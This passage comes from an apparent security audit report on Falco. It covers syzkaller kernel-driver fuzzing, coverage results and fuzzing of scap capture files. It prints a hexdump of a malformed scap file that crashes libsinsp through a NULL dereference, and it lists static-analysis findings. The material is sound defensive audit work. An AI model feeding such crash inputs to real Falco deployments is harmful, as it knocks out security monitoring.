\"0.0.0.0:8080\",\n\"workdir\" : \"/home/jdoe/syzkaller/syzkaller/workdir\",\n\"kernel_obj\" : \"/home/jdoe/syzkaller/linux\",\n\"module_obj\" : [\"/home/jdoe/syzkaller/falco/build/driver\"],\n\"kernel_subsystem\" : [ { \"name\": \"falco\", \"path\":\n[\"/home/jdoe/syzkaller/falco/build/driver/src\"]}], \u25c1arrowhookleft\u2192\n\"image\": \"/home/jdoe/syzkaller/image/stretch.img\",\n\"sshkey\" : \"/home/jdoe/syzkaller/image/stretch.id_rsa\",\n\"syzkaller\" : \"/home/jdoe/syzkaller/syzkaller\",\n\"procs\": 4,\n\"type\": \"qemu\",\n\"vm\": {\n\"count\": 2,\n\"kernel\" : \"/home/jdoe/syzkaller/linux/arch/x86/boot/bzImage\",\n\"cpu\": 2,\n\"mem\": 2048,\n}\n}\nRunning syzkaller is then as easy as running\n./bin/syz-manager -config=./stretch.cfg\nSyzkaller needs to start each fuzzing VM with the --snaphot option, which means that after\nrebooting, any filesystem modification is lost. But this doesn\u2019t prevent us to ssh into a working\nVM and take a look at /var/log/user.log to check if Falco has caught some events:\nroot@syzkaller:~# grep falco /var/log/user.log\n...\nNov 23 22:37:20 syzkaller falco: Opening capture with Kernel module\nNov 23 22:37:25 syzkaller falco: 22:37:25.448433801: Error File below / or /root\nopened for writing (user=root user_loginuid=0 command=scp -t /syz-fuzzer\npid=362 parent=sshd file=/syz-fuzzer program=scp container_id=host image=<NA>)\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nNov 23 22:37:26 syzkaller falco: 22:37:26.648266483: Error File below / or /root\nopened for writing (user=root user_loginuid=0 command=scp -t /syz-executor\npid=370 parent=sshd file=/syz-executor program=scp container_id=host\nimage=<NA>)\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nNov 23 22:37:39 syzkaller falco: 22:37:39.810731946: Error File created below\n/dev by untrusted program (user=root user_loginuid=0 command=syz-executor.0\nexec pid=2188 file=/dev/sr0 container_id=host image=<NA>)\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nNov 23 22:37:39 syzkaller falco: 22:37:39.832322826: Error File created below\n/dev by untrusted program (user=root user_loginuid=0 command=syz-executor.3\nexec pid=2222 file=/dev/nvram container_id=host image=<NA>)\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n...\nThe first two events are just showing some internals from syzkaller, the syz-manager on the host\nis pushing its binaries into the vm with scp, and then the two following events show that those\nbinaries start playing with devices.\nRef: 23-01-1097-LIV 37 Quarkslab SASGathering information from the userland Falco process\nAt this point, an attentive reader will have noted that we are just able to get information from\nthe Falco driver, there is no coverage for the Falco userland process, nor even notification if this\nprocess crashes.\nIf getting coverage for a userland process would require more work to adapt Syzkaller, which was\nnot the aim of this assessment, we nevertheless thought that it would not be so complicated to\ndetect crashes. Indeed, when a userland process crashes, it is reported in the local syslog. We\u2019ve\nalready said that syzkaller starts the VM with the --snapshot option, so to keep track of those\npotential crashes through reboots, we just configured the VM syslog to forward interesting events\nto the host syslog.\nThis required very few modifications of our image, and a small fix in the way syzkaller is starting\nthe QEMU VM, due to the --restrict option used by syzkaller to isolate the guest and the host\nnetwork, obviously to prevent bad things to happen to the host. QEMU provides an option to\nexpose a listening socket on the host side inside the guest, thanks to the guestfwd options. Be\ncareful, the port must be bound beforestarting QEMU.\n\u2022So the code configuring the network stack of QEMU VM in /vm/qemu/qemu.go has been\nfixed by:\ndiff --git a/vm/qemu/qemu.go b/vm/qemu/qemu.go\nindex d9933fa05..eac312f66 100644\n--- a/vm/qemu/qemu.go\n+++ b/vm/qemu/qemu.go\n@@ -435,7 +435,8 @@ func (inst *instance) boot() error {\nargs = append(args, splitArgs(inst.cfg.QemuArgs, templateDir,\ninst.index)...) \u25c1arrowhookleft\u2192\nargs = append(args,\n\"-device\", inst.cfg.NetDev+\",netdev=net0\",\n- \"-netdev\",\nfmt.Sprintf(\"user,id=net0,restrict=on,hostfwd=tcp:127.0.0.1:%v-:22\",\ninst.port))\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n+ \"-netdev\",\nfmt.Sprintf(\"user,id=net0,restrict=on,hostfwd=tcp:127.0.0.1:%v-:22\"+ \u25c1arrowhookleft\u2192\n+ \",guestfwd=tcp:10.0.2.1:514-tcp:127.0.0.1:514\",\ninst.port)) \u25c1arrowhookleft\u2192\nif inst.image == \"9p\" {\n\u2022In the VM image, in /etc/rsyslog.conf , two new actions were added to forward kernel\nand user events to the exposed remote TCP service: kern.* @@10.0.2.1:514 anduser.*\n@@10.0.2.1:514 . Indeed, the only events received with the user facility are Falco events,\nwhich enable us to also have a log on the host of all triggered events.\n\u2022The syslog startup must be postponed after the network setup, by adding to the [Unit]\npart of/etc/systemd/system/syslog.service\nAfter=network.target auditd.service\nRef: 23-01-1097-LIV 38 Quarkslab SAS\u2022And to try to get some information in case of a crash, at least a stack trace, kernel.core_-\npattern was configured with a custom script which just calls coredumpctl info $1 |\nlogger -p user.notice after having executed systemd-coredump .\n\u2022Finally, Falco was recompiled with ASAN, in order to get potential memory error under\nheavy syscalls load.\nResults\nAfter a 48 hours run of syzkaller, Falco kernel driver did not cause any crash. See Table 7.1 for\nmore information. Nevertheless, other crashes were found, like a general protection fault in\nscsi_queue_rq . However those bugs have already been caught and reported by syzbot12.\nuptime 32h345s\nfuzzing 49h41m0s\ncorpus 10540\nsignal 130782\ncoverage 86763\nsyscalls 2125\ncrash types 10 (0/hour)\ncrashes 28 (0/hour)\nexec total 6557347 (55/sec)\nTable 7.1: Syzkaller fuzzing campaign stats results\nSee Table 7.2 for coverage information on the Falco kernel module.\nfilename covergae basic block\nfalco/build/driver/src 57% (81%) of 3660(2574)\nmain.c 16% (52%) of 568(175)\nppm_cputime.c \u2014 of 1\nppm_events.c 40% (46%) of 385(337)\nppm_fillers.c 68% (89%) of 2705(2062)\nppm_flag_helpers.h 100% (0%) of 1(0)\nTable 7.2: Coverage on Falco kernel module code\nClearly, when syzkaller starts its fuzzing process inside the VM, Falco is already started and the\ndriver loaded, so there is no reason to see coverage, for example, for various parts of main.c,\nas the one which handles driver initialization or the file_operations used when a userland\nprocess opens the falco driver or memory map it.\n12https://syzkaller.appspot.com/upstream\nRef: 23-01-1097-LIV 39 Quarkslab SASAn interesting point is the coverage of ppm_fillers.c , which contains a hook for each syscall in\norder to extract its parameters, and gives a good idea of which syscall has been reached by the\nfuzzer. See the following Table 7.3, for a small extract of the coverage for the f_sys_xxx_e|x\nhandled in this source file. The full HTML coverage report will be included with this report under\nthe file name syzkaller-kernel-module-coverage.html.gz .\nfunction name coverage basic block\n... ... ...\nf_sys_accept4_e 100% of 1\nf_sys_accept_x 83% of 17\nf_sys_access_e \u2014 of 10\nf_sys_bpf_x \u2014 of 1\nf_sys_brk_munmap_mmap_x \u2014 of 7\nf_sys_capset_x 98% of 250\nf_sys_chmod_x 94% of 33\nf_sys_connect_e 80% of 20\nf_sys_connect_x 75% of 16\nf_sys_copy_file_range_e \u2014 of 13\nf_sys_copy_file_range_x \u2014 of 7\nf_sys_creat_e 95% of 34\nf_sys_creat_x 96% of 43\n... ... ...\nTable 7.3: Coverage on the Falco kernel module fillers\nCoverage of ppm_events.c , which contains various tool functions used by ppm_fillers.c to\nextract the syscall arguments, is also interesting, see the following Table 7.4.\nRef: 23-01-1097-LIV 40 Quarkslab SASfunction name coverage basic block\naddr_to_kernel 100% of 5\ncompat_parse_readv_writev_bufs \u2014 of 26\ncompute_snaplen 2% of 150\ndpi_lookahead_init \u2014 of 1\nf_sys_autofill 85% of 13\nfd_to_socktuple 60% of 61\npack_addr 91% of 11\nparse_readv_writev_bufs 97% of 26\nppm_copy_from_user 100% of 4\nppm_strncpy_from_user 100% of 11\nsock_getname \u2014 of 21\nval_to_ring 86% of 56\nTable 7.4: Coverage of function in ppm_events.c\nMost of the missed code comes from the compute_snaplen , which has been manually reviewed.\nConcerning the Falco userland process, once again, no crash. And yet, we can see it was in high\ndemand thanks to the various syscall event drop present in the Falco notifications:\nDec 2 07:43:31 syzkaller falco: 07:43:24.933425157: Debug Falco internal: syscall\nevent drop. 10551 system calls dropped in last second. \u25c1arrowhookleft\u2192\n(ebpf_enabled=0 n_drops=10551 ... n_drops_buffer_total=10551 ... n_evts=14714)\nConclusion\nSyzkaller appeared to be an interesting option for blackbox fuzzing of Falco\u2019s solution, enabling\nto challenge both the driver and userland application at a high level rate of event, and being able\nto trigger complex syscall chain. Falco showed no weakness in dealing with this large amount of\nunusual events, despite long fuzzing sessions.\nAwaytoimprovethisfuzzingsolution, wouldbetoadduserlandprocesscoveragetothissyzkaller\nbased solution in to better guide the fuzzer.\n7.2.3 Using the scap file format\nFalco can, in addition of the live capture from the kernel module or eBPF probes, read files in\nthescapfile format13to process and filter the events based on the content. The sysdig tool14\ncan capture syscalls event and generate such file in the scapformat. Falco maintainers kindly\n13Thescapformat is a flavor of the, often used for network, pcapfile format. Note that Gerald Combs, the creator\nand maintainer of Wireshark was hired by Sysdig, the initial parent company of Falco.\n14https://github.com/draios/sysdig\nRef: 23-01-1097-LIV 41 Quarkslab SASdirected us toward a repository, sysflow-telemetry/sf-collector where some specific scapfiles are\navailable15.\nFor fuzzing directly the file format, inspiration was taken from the very helpful examples in the\nlibs/libsinsp folder16keeping only the part concerning the SAVEFILE engine. You can find the\ncomplete harness in the git diff file named fuzz_file.diff attached to the report. The binary\nwas compiled with ASAN.\nThe issue is that, as expected, the fuzzing mostly uncovered crashes from the file decoding part\nsince these files input are what we could call \u201ccorrupted\u201d, for example having a header \u201clying\u201d\nabout the content of the body. It seems that the file engine and the event processor assume that\nfile should be valid which is reasonable. Indeed these crashes are not critical because they are\nonly concerning a Falco instance that was ran especially for filtering and investigating about the\ncontent of the files.\nOn top of that, fuzzing is particularly slow (around 50/100 execution per second), which might\nbe because the code parsing the file is actually making a lot of read(2) syscalls, which is not\nideal in terms of performance. But for an unclear reason a lot of the execution timeout after 1s\nor a bit more which slows everything down (it might be related to ASAN but it\u2019s not clear). In\norder to find out, it would be reasonable to first fix all the previous crash, which would imply to\nrefactor some parts of the parsing more defensively.\nAn archive with the name fuzz-scap-file-results.tar.gz contains the results of a small\nsession of fuzzing, around an hour in total. The file ending in .fuzzcan be used as input of the\nharness to provoke the crash their name indicates. Usually a good idea is to build the harness\nwithout optimization, using -O0, not-Og, and debugging with the help of gdb, for example, to\nfind the root of the crash. Please note that some inputs only generate crash because of ASAN but\nare silent memory bug without the sanitizer enabled. Inputs starting with SIGVTALRM are inputs\nthat somehow created an execution timeout (still unclear why and maybe not the priority).\nExample of crash using malformed scap file\nHereisanexampletoillustrate, let\u2019sarbitrarytakethesmallestcrashinputgeneratedforconcision\nreason. The name of the file (see HonggFuzz documentation on how to read the name17),\nisSIGSEGV.PC.5555560369be.STACK.c30617a76.CODE.1.ADDR.55575e149b22.INSTR.mov__-\n__(%rax),%rax.fuzz\n00000000 : 0a0d 0d0a 1c00 0000 4d3c 2b1a 0100 0200 ffff ffff ........M<+.........\n00000014 : ffff ffff 1c00 0000 2102 0000 c000 0000 1000 0000 ........!...........\n00000028 : 00e0 dbb8 fe61 7269 612d 3235 362d 6163 6dff 0f00 .....aria-256-acm...\n0000003c : 7377 00ff 0000 0000 0000 3863 6439 6430 6631 3438 sw........8cd9d0f148\n00000050 : 3438 0000 0000 0000 0000 0000 0000 0000 0000 0000 48..................\n00000064 : 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ....................\n00000078 : 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ....................\n0000008c : 0000 0000 0000 0000 0000 0000 0000 0063 7075 5f73 ...............cpu_s\n000000a0 : 6800 0000 0000 0000 0000 0000 0000 0000 0000 0000 h...................\n15https://github.com/sysflow-telemetry/sf-collector/tree/master/tests\n16https://github.com/falcosecurity/libs/tree/master/userspace/libsinsp/examples\n17https://github.com/google/honggfuzz/blob/master/docs/USAGE.md#output-files\nRef: 23-01-1097-LIV 42 Quarkslab SAS000000b4 : 0000 0000 0000 0000 0000 00f1 0000 0000 0000 0000 ....................\n000000c8 : 0063 6173 7435 2d65 6362 0000 0000 0000 0000 0000 .cast5-ecb..........\n000000dc : 0000 0000 0000 0000 ff00 0000 0000 0001 0000 0000 ....................\n000000f0 : 0000 ..\nThisinputwillcausetoprogramtostopon segmentation fault becauseofaNULLpointerderef-\nerencesinsp_parser::parse_clone_exit atlibs/userspace/libsinsp/parsers.cpp:1017 . Indeed\nthe faulty code is illustrated in the following listing.\n1015parinfo = evt->get_param(0);\n1016[...] // there is an assert here.\n1017childtid = *( int64_t *)parinfo->m_val;\nTheparinfo variable has for type sinsp_evt_param which could be simplified to this C structure.\nstruct sinsp_evt_param {\nchar* m_val; ///< Pointer to the event parameter data.\nuint32_t m_len; ///< Length of the parameter pointed by m_val.\n};\nIn the case of this malformed scap file, the function behind get_param will return a sinsp_-\nevt_param instance with m_valbeing a NULL pointer thus provoking the error on the NULL\ndereference in the next line of the example, line 1017 of the parsers.cpp file.\nINFO 9 Multiple crashes in the parsing of scap files and event buffer with malformed files\nCategory Null dereference\nRating Impact: Availability Exploitability : Easy\nConclusion\nAlthough the results of this fuzzing campaign reveal really concrete bugs, it seems that they can\nonly be triggered locally with malformed scap files, which reduce drastically the criticality of these\ncrashes. The challenge that we encounter in this Section 7.2 is exactly to overcome these bugs,\ntrying to find crashes that can be triggered by real events, encoded by the kernel counterpart of\nFalco, without breaking the encoding.\nFixing these issues would make Falco more robust but would not significantly make this form\nof fuzzing better, since most of the input generated by the random fuzzer would still be invalid\nencoding, and thus discarded by Falco. To illustrate how unstructured fuzzing is inappropriate\nin this situation, we could see that as fuzzing, for example, a TCP segment without knowing\nthe structure of the headers and not fixing the checksum. Most of the input generated will hit a\nvalidation wall and stay at the very early stage of the program execution.\nRef: 23-01-1097-LIV 43 Quarkslab SAS7.3 Conclusion\nFuzzing the core of Falco proved to be non-trivial because of the complexity of the events parser\ninputs. We approached this problem with different strategies. First trying to fuzz specifically some\nparsers with libprotobuf-mutator and highly structured fuzzing. Then doing black box fuzzing\nof Falco and its driver via syzkaller. And finally trying to do random fuzzing using the scap file\nformat. These approaches have limitations but the syzkaller and libprotobuf-mutator technics\ncould be useful to discover real bugs.\nRef: 23-01-1097-LIV 44 Quarkslab SAS8 Conclusion\nTo conclude, Quarkslab provided many leads and strategies on how to implement static and\ndynamic security analysis of the Falco project in the restricted amount of time. This audit also\nunveiledsomeissuesinthecodebase, thankstotheautomatedtoolsandthemanualinvestigations,\nbut nothing critical or exploitable in the end.\nOverall, it was a pleasure to work with the Falco maintainers on this audit, they were very helpful\nand willing to make the project more secure.\nRef: 23-01-1097-LIV 45 Quarkslab SASGlossary\nASANAddress Sanitizer is a memory error detector for C and C++, find more information in\nits documentation https://github.com/google/sanitizers/wiki/AddressSanitizer .\nCNCFThe Cloud Native Computing Foundation (CNCF) is a Linux Foundation project that was\nfounded in 2015 to help advance container technology and align the tech industry around\nits evolution.\npersistent mode In persistent mode, fuzzers fuzzes a target multiple times in a single forked\nprocess, instead of forking a new process for each fuzz execution. This is the most effective\nway to fuzz, as the speed can easily be x10 or x20 times faster without any disadvantages.\nPersistent mode requires that the target can be called in one or more functions, and that\nit\u2019s state can be completely reset so that multiple calls can be performed without resource\nleaks, and that earlier runs will have no impact on future runs.\nprotobuf Protocol Buffers (a.k.a., protobuf) are Google\u2019s language-neutral, platform-neutral,\nextensible mechanism for serializing structured data. See the documentation for more\ninformation https://developers.google.com/protocol-buffers/ .\nRef: 23-01-1097-LIV 46 Quarkslab SASBibliography\n[1]Falco maintainers. Build Falco from source . The Falco documentation. url:https://falco.\norg/docs/getting-started/source/ (visited on Dec. 6, 2022) (cit. on p. 6).\n[2]Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, MSc. D. Wei\u00dfer, B. Walny, BSc. J. Hector,\nand J. Larsson. Pentest-Report Falco . July 24, 2019. url:https://cure53.de/pentest-\nreport_falco.pdf (visited on Dec. 5, 2022) (cit. on p. 6).\n[3]Hi120ki. Discuss about fundamental solution of detecting symlink file based bypass method\n#2203.Sept.13,2022. url:https://github.com/falcosecurity/falco/issues/2203\n(visited on Dec. 6, 2022) (cit. on p. 6).\n[4]Mark Manning. Container Runtime Security Bypasses on Falco . Sept. 15, 2019. url:https:\n//www.antitree.com/2019/09/container-runtime-security-bypasses-on-falco/\n(visited on Dec. 19, 2022) (cit. on p. 6).\n[5]Brad Geesaman. Falco Default Rule Bypass . Sept. 11, 2020. url:https://web.archive.\norg/web/20220605221820/https://darkbit.io/blog/falco-rule-bypass (visited\non Dec. 19, 2022) (cit. on p. 6).\n[6]Leonardo Di Donato. Bypass Falco . May 4, 2021. url:https://www.youtube.com/watch?\nv=nGqWskXRSmo (visited on Dec. 19, 2022) (cit. on p. 6).\n[7]Shay Berkovich. Bypassing Falco - How to compromise a cluster without tripping the SOC .\nJuly 15, 2021. url:https://github.com/blackberry/Falco-bypasses (visited on\nDec. 19, 2022) (cit. on p. 6).\n[8]Jason Dellaluce and Federico Di Pierro. Monitoring new syscalls with Falco . The Falco Blog.\nJan. 17, 2022. url:https://falco.org/blog/falco-monitoring-new-syscalls/\n(visited on Dec. 5, 2022) (cit. on p. 6).\n[9]inOva.Falco Design Principle Analysis . Chinese. Jan. 10, 2021. url:https://driverxdw.\ngithub.io/2021/01/10/Falco-Design-Principle-Analysis/ (visited on Dec. 5,\n2022) (cit. on p. 6).\n[10]inOva.Sysdig Source Code Analysis . Chinese. Part 1 https://driverxdw.github.io/\n2021/05/29/Sysdig-Source-Code-Analysis/ and part 2 https://driverxdw.github.\nio/2021/06/27/Sysdig-Source-Code-Analysis-II/ . May 29, 2021. (Visited on Dec. 5,\n2022) (cit. on p. 6).\n[11]Mark Stemm. CVE-2019-8339, a Falco capacity related vulnerability . Sysdig blog. May 13,\n2019. url:https://sysdig.com/blog/cve-2019-8339-falco-vulnerability/\n(visited on Dec. 6, 2022) (cit. on p. 6).\n[12]Falco maintainers. GitHub Security Advisories . Falcohttps : / / github . com /\nfalcosecurity/falco/security/advisories and libs https://github.com/\nfalcosecurity/libs/security/advisories . (Visited on Dec. 6, 2022) (cit. on p. 6).\nRef: 23-01-1097-LIV 47 Quarkslab SASAppendix A\nSeverity Classification\nSeverity Description\nMedium Medium issues that cannot be directly exploited, such as buffer overflows that\ncould potentially lead to a crash, arbitrary read or arbitrary code execution by\nunprivileged users if exploitable in the future.\nLow Low issues that cannot be directly exploited, such as memory, resource leak or Null\npointer dereference that could lead to a crash of the program by unprivileged users.\nInfo Minor issues such as programming mistakes or the above issues happening in less\nimportant parts of the code, like debug or test code that makes it unreachable from\nunprivileged users.\nRef: 23-01-1097-LIV 48 Quarkslab SASAppendix B\nInfer report extracts\nThis is Infer\u2019s partial report, errors not mentioned were removed from this extract, see the\ninfer-report.txt file for the complete version.\n#9\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/plugin/plugin_loader.c:73: error: Null Dereference\npointer `ret`last assigned on line 55 could be null and is dereferenced at line 73, column 5.\n71. }\n72. #else\n73. ret->handle = dlopen(path, RTLD_LAZY);\n^\n74. if (ret->handle == NULL)\n75. {\n#13\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/kmod/scap_kmod.c:67: error: Resource\nLeak \u25c1arrowhookleft\u2192\nresource of type `_IO_FILE `acquired to `return `by call to `fopen() `at line 61, column 16 is not released after line 67, column 4.\n65. if(w == 0)\n66. {\n67. return 0;\n^\n68. }\n69.\n#15\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/savefile/scap_reader_gzfile.c:72:\nerror: Null Dereference \u25c1arrowhookleft\u2192\npointer `h`last assigned on line 71 could be null and is dereferenced at line 72, column 5.\n70.\n71. reader_handle_t* h = (reader_handle_t *) malloc (sizeof (reader_handle_t));\n72. h->m_file = file;\n^\n73.\n74. scap_reader_t* r = (scap_reader_t *) malloc (sizeof (scap_reader_t));\n#16\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/savefile/scap_reader_gzfile.c:75:\nerror: Null Dereference \u25c1arrowhookleft\u2192\npointer `r`last assigned on line 74 could be null and is dereferenced at line 75, column 5.\n73.\n74. scap_reader_t* r = (scap_reader_t *) malloc (sizeof (scap_reader_t));\n75. r->handle = h;\n^\n76. r->read = &gzfile_read;\n77. r->offset = &gzfile_offset;\n#17\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/filterchecks.cpp:80: error: Null\nDereference \u25c1arrowhookleft\u2192\npointer `loc`last assigned on line 78 could be null and is dereferenced at line 80, column 8.\n78. loc = localtime(&t);\n79.\n80. dt = (loc->tm_hour - gmt->tm_hour) * 60 * 60 + (loc->tm_min - gmt->tm_min) * 60;\n^\n81.\n82. dir = loc->tm_year - gmt->tm_year;\n#24\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/logger.cpp:85: error: Resource Leak\nresource of type `_IO_FILE `acquired by call to `fopen() `at line 85, column 11 is not released after line 85, column 2.\n83. ASSERT(m_file == nullptr);\n84.\n85. m_file = fopen(filename.c_str(), \"w\");\n^\n86. if(!m_file)\n87. {\n#25\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/parsers.cpp:99: error: Null Dereference\npointer `evt_state->m_piscapevt `last assigned on line 97 could be null and is dereferenced at line 99, column 2.\n97. evt_state.m_piscapevt = (scap_evt*) realloc(evt_state.m_piscapevt, buf_size);\n98. evt_state.m_scap_buf_size = buf_size;\n99. evt_state.m_piscapevt->type = evt_type;\nRef: 23-01-1097-LIV 49 Quarkslab SAS^\n100. evt_state.m_metaevt.m_pevt = evt_state.m_piscapevt;\n101. }\n#28\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/savefile/scap_reader_buffered.c:132:\nerror: Null Dereference \u25c1arrowhookleft\u2192\npointer `h`last assigned on line 131 could be null and is dereferenced at line 132, column 5.\n130.\n131. reader_handle_t* h = (reader_handle_t *) calloc (1, sizeof (reader_handle_t));\n132. h->m_close_reader = own_reader;\n^\n133. h->m_reader = reader;\n134. h->m_buffer = (uint8_t*) malloc (sizeof(uint8_t) * bufsize);\n#29\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/savefile/scap_reader_buffered.c:138:\nerror: Null Dereference \u25c1arrowhookleft\u2192\npointer `r`last assigned on line 137 could be null and is dereferenced at line 138, column 5.\n136.\n137. scap_reader_t* r = (scap_reader_t *) malloc (sizeof (scap_reader_t));\n138. r->handle = h;\n^\n139. r->read = &buffered_read;\n140. r->offset = &buffered_offset;\n#38\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/examples/test.cpp:237: error: Resource Leak\nresource acquired by call to `open() `at line 229, column 11 is not released after line 237, column 2.\n235. goto error;\n236.\n237. atexit(remove_module);\n^\n238.\n239. return true;\n#42\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/engine/bpf/scap_bpf.c:351: error: Null\nDereference \u25c1arrowhookleft\u2192\npointer `sym`last assigned on line 342 could be null and is dereferenced at line 351, column 6.\n349. }\n350.\n351. if(sym[*nr_maps].st_shndx != maps_shndx)\n^\n352. {\n353. continue;\n#43\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_fds.c:544: error: Null Dereference\npointer `handle->m_dev_list->hh.tbl `last assigned on line 544 could be null and is dereferenced by call to `memset() `at line 544,\ncolumn 5. \u25c1arrowhookleft\u2192\n542. mountinfo->mount_id = mount_id;\n543. mountinfo->dev = dev;\n544. HASH_ADD_INT64(handle->m_dev_list, mount_id, mountinfo);\n^\n545. if(uth_status != SCAP_SUCCESS)\n546. {\n#45\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:635: error: Null Dereference\npointer `zero `last assigned on line 634 could be null and is dereferenced by call to `memcmp() `at line 635, column 8.\n633. size_t sz = len - offset;\n634. void* zero = calloc(sz, sizeof(char));\n635. if(!memcmp(left, zero, sz))\n^\n636. {\n637. free(zero);\n#51\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_fds.c:710: error: Null Dereference\npointer `*sockets_by_ns->hh.tbl `last assigned on line 710 could be null and is dereferenced by call to `memset() `at line 710,\ncolumn 4. \u25c1arrowhookleft\u2192\n708. char fd_error[SCAP_LASTERR_SIZE];\n709.\n710. HASH_ADD_INT64(*sockets_by_ns, net_ns, sockets);\n^\n711. if(uth_status != SCAP_SUCCESS)\n712. {\n#52\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_fds.c:706: error: Null Dereference\npointer `sockets `last assigned on line 705 could be null and is dereferenced at line 706, column 4.\n704. {\n705. sockets = malloc(sizeof(struct scap_ns_socket_list));\n706. sockets->net_ns = net_ns;\n^\n707. sockets->sockets = NULL;\n708. char fd_error[SCAP_LASTERR_SIZE];\nRef: 23-01-1097-LIV 50 Quarkslab SAS#53\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_fds.c:876: error: Null Dereference\npointer `_he_new_buckets `last assigned on line 876 could be null and is dereferenced by call to `memset() `at line 876, column 3.\n874. }\n875.\n876. HASH_ADD_INT64((*sockets), ino, fdinfo);\n^\n877. if(uth_status != SCAP_SUCCESS)\n878. {\n#54\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:792: error: Null Dereference\npointer `fdt`last assigned on line 790 could be null and is dereferenced at line 792, column 11.\n790. sinsp_fdtable* fdt = get_fd_table();\n791.\n792. for(it = fdt->m_table.begin(); it != fdt->m_table.end(); ++it)\n^\n793. {\n794. if(it->second.m_type == SCAP_FD_IPV4_SOCK)\n#56\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:819: error: Null Dereference\npointer `fdt`last assigned on line 817 could be null and is dereferenced at line 819, column 11.\n817. sinsp_fdtable* fdt = get_fd_table();\n818.\n819. for(it = fdt->m_table.begin();\n^\n820. it != fdt->m_table.end(); ++it)\n821. {\n#57\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:914: error: Null Dereference\npointer `newbuf `last assigned on line 913 could be null and is dereferenced by call to `memset() `at line 914, column 4.\n912. {\n913. void* newbuf = malloc(sizes->at(j));\n914. memset(newbuf, 0, sizes->at(j));\n^\n915. m_private_state.push_back(newbuf);\n916. }\n#59\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_savefile.c:985: error: Null Dereference\npointer `res`last assigned on line 984 could be null and is dereferenced at line 985, column 2.\n983. {\n984. scap_dumper_t* res = (scap_dumper_t*)malloc(sizeof(scap_dumper_t));\n985. res->m_f = gzfile;\n^\n986. res->m_type = DT_FILE;\n987. res->m_targetbuf = NULL;\n#60\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_savefile.c:1064: error: Resource Leak\nresource of type `_IO_FILE `acquired by call to `gzdopen() `at line 1042, column 8 is not released after line 1064, column 9.\n1062. }\n1063.\n1064. return scap_dump_open_gzfile(handle, f, fname, skip_proc_scan);\n^\n1065. }\n1066.\n#61\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_savefile.c:1093: error: Resource Leak\nresource of type `_IO_FILE `acquired by call to `gzdopen() `at line 1076, column 7 is not released after line 1093, column 9.\n1091. }\n1092.\n1093. return scap_dump_open_gzfile(handle, f, \"\", skip_proc_scan);\n^\n1094. }\n1095.\n#62\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_savefile.c:1093: error: Resource Leak\nresource of type `_IO_FILE `acquired by call to `gzdopen() `at line 1079, column 7 is not released after line 1093, column 9.\n1091. }\n1092.\n1093. return scap_dump_open_gzfile(handle, f, \"\", skip_proc_scan);\n^\n1094. }\n1095.\n#67\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1418: error: Null Dereference\npointer `_he_new_buckets `last assigned on line 1418 could be null and is dereferenced by call to `memset() `at line 1418, column 2.\n1416. int32_t uth_status = SCAP_SUCCESS;\n1417.\n1418. HASH_ADD_INT64(handle->m_proclist.m_proclist, tid, tinfo);\n^\n1419. if(uth_status == SCAP_SUCCESS)\n1420. {\nRef: 23-01-1097-LIV 51 Quarkslab SAS#68\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1418: error: Null Dereference\npointer `handle->m_proclist.m_proclist->hh.tbl `last assigned on line 1418 could be null and is dereferenced by call to `memset() `\nat line 1418, column 2. \u25c1arrowhookleft\u2192\n1416. int32_t uth_status = SCAP_SUCCESS;\n1417.\n1418. HASH_ADD_INT64(handle->m_proclist.m_proclist, tid, tinfo);\n^\n1419. if(uth_status == SCAP_SUCCESS)\n1420. {\n#69\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:1482: error: 